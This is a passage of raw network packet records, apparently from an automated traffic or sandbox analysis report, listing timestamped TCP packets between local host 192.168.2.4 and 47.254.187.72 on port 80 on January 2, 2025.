                                                                            Jan 2, 2025 20:34:55.482649088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.482654095 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.482692957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.485857010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.485867977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.485877991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.485888958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.485908985 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.485940933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.487498999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.487509966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.487526894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.487538099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.487546921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.487548113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.487582922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.490806103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.490844011 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.490848064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.490859032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.490876913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.490879059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.490886927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.490906000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.490927935 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.492538929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.492549896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.492571115 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.492587090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.492592096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.492599010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.492609978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.492623091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.492640018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.492660046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.494154930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.494174957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.494190931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.494210005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.494210005 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.494225025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.494235039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.494321108 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.507812977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.507858992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.507869005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.507879019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.507889986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.507903099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.507909060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.507920027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.507931948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.507932901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.507961988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.507973909 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.507994890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.512885094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.512897968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.512917042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.512923956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.512928009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.512939930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.512950897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.512954950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.512963057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.512973070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.512995005 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.513011932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.516917944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.516937971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.516948938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.516961098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.516961098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.516988993 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.517021894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.517051935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.517062902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.517075062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.517082930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.517083883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.517103910 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.517129898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.522031069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.522042036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.522053003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.522063971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.522069931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.522077084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.522089005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.522095919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.522102118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.522110939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.522151947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.527843952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.527884007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.527884007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.527904034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.527923107 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.527941942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.527952909 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.527952909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.527964115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.527973890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.527975082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.527985096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.527996063 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.528027058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.531259060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.531284094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.531296015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.531306028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.531322002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.531327963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.531338930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.531349897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.531354904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.531362057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.531373978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.531398058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.531428099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.620080948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.620096922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.620109081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.620120049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.620130062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.620157957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.622694969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.622735023 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.622754097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.622767925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.622778893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.622785091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.622791052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.622800112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.622814894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.622842073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.624209881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.624241114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.624267101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.624275923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.624286890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.624294996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.624296904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.624320030 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.624355078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.626262903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.626275063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.626286030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.626297951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.626311064 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.626346111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.629935980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.629972935 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.630002022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.630012035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.630023003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.630037069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.630058050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.632332087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.632342100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.632359028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.632365942 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.632369995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.632379055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.632391930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.632424116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.633913994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.633955002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.633961916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.633972883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.633982897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.633992910 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.634016037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.635395050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.635413885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.635423899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.635441065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.635442019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.635449886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.635474920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.635509968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.639206886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.639219046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.639234066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.639245987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.639250040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.639251947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.639283895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.640480995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.640490055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.640516996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.706696033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.706715107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.706746101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.706768990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.036659956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.041589022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.525973082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.525993109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526004076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526034117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526032925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526045084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526052952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526061058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526063919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526067972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526076078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526083946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526097059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526103973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526108027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526118040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526130915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526134968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526139975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526148081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526150942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526160955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526170015 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526180983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526190996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526191950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526206970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526212931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526216984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526226997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526232004 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526237011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526247025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526256084 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526256084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526267052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526277065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526283979 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526287079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526307106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526309013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526319981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526329041 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526330948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526343107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526348114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526352882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526362896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526374102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526382923 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526384115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526395082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526405096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526415110 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526422977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526439905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526443958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526463032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526478052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526489973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526499033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526509047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526518106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526529074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526535034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526537895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526549101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526557922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526567936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526571989 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526578903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526587963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526593924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526603937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526612043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526614904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526624918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526634932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526635885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526644945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526654959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526655912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526664019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526683092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526684999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526695967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526700974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526720047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526721954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526734114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526742935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526752949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526753902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526763916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526772976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526773930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526782990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526793003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526803017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526810884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526813984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526823997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526832104 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526834011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526844978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526851892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526855946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526875973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526879072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526890993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526891947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526900053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526911020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526911974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526918888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526930094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526940107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526940107 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526948929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526966095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526971102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.526977062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526985884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.526995897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527007103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527014971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527014971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527015924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527026892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527033091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527036905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527046919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527055979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527056932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527066946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527076960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527080059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527086973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527097940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527100086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527107954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.527120113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.527134895 CET804973047.254.187.72192.168.2.4
